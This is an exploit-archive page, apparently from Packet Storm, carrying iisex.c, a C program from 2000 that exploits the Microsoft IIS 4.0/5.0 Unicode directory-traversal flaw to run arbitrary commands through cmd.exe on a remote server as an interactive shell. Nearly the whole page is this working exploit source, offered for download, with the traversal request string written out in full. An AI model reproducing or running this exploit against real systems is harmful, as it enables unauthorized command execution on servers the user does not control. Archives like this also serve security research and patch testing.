what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

iisex.c

iisex.c
Posted Oct 19, 2000
Authored by Incubus | Site securax.org

iisex.c is a remote command execution exploit for Microsoft IIS 4.0 and 5.0, as discussed in iis-unicode.txt which attempts to provide an interactive cmd.exe shell.

tags | exploit, remote, shell
SHA-256 | 4750ce76fa11a85f6f1ef97478408066fedff3d6adc705ce98126be2563f7cf6

iisex.c

Change Mirror Download

/* iisex iis exploit (<- nost's idea) v2
* --------------------------------------
* Okay.. the first piece of code was not really finished.
* So, i apologize to everybody..
*
* by incubus <incubus@securax.org>
*
* grtz to: Bio, nos, zoa, reg and vor... (who else would stay up
* at night to exploit this?) to securax (#securax@efnet) - also
* to kim, glyc, s0ph, tessa, lamagra and steven.
* thx to spydir :)
*/

#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

int main(int argc, char **argv){
char buffy[666]; /* well, what else? I dunno how long your commands are.. */
char buf[500];
char rcvbuf[8192];
int i, sock, result;
struct sockaddr_in name;
struct hostent *hostinfo;
if (argc < 2){
printf ("try %s www.server.com\n", argv[0]);
printf ("will let you play with cmd.exe of an IIS4/5 server.\n");
printf ("by incubus <incubus@securax.org>\n\n");
exit(0);
}
printf ("\niisex - iis 4 and 5 exploit\n---------------------------\n");
printf ("act like a cmd.exe kiddie, type quit to quit.\n");
for (;;)
{
printf ("\n[enter cmd> ");
gets(buf);
if (strstr(buf, "quit")) exit(0);
i=0;
while (buf[i] != '\0'){
if(buf[i] == 32) buf[i] = 43;
i++;
}
hostinfo=gethostbyname(argv[1]);
if (!hostinfo){
herror("Oops"); exit(-1);
}

name.sin_family=AF_INET; name.sin_port=htons(80);
name.sin_addr=*(struct in_addr *)hostinfo->h_addr;
sock=socket(AF_INET, SOCK_STREAM, 0);
result=connect(sock, (struct sockaddr *)&name, sizeof(struct sockaddr_in));
if (result != 0) { herror("Oops"); exit(-1); }
if (sock < 0){
herror("Oops"); exit(-1); }
strcpy(buffy,"GET /scripts/..\%c0%af../winnt/system32/cmd.exe?/c+");
strcat(buffy,buf);
strcat(buffy, " HTTP/1.0\n\n");
send(sock, buffy, sizeof(buffy), 0);
recv(sock, rcvbuf, sizeof(rcvbuf), 0);
printf ("%s", rcvbuf);
close(sock);
}
}
Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    14 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    11 Files
  • 8
    Dec 8th
    45 Files
  • 9
    Dec 9th
    9 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close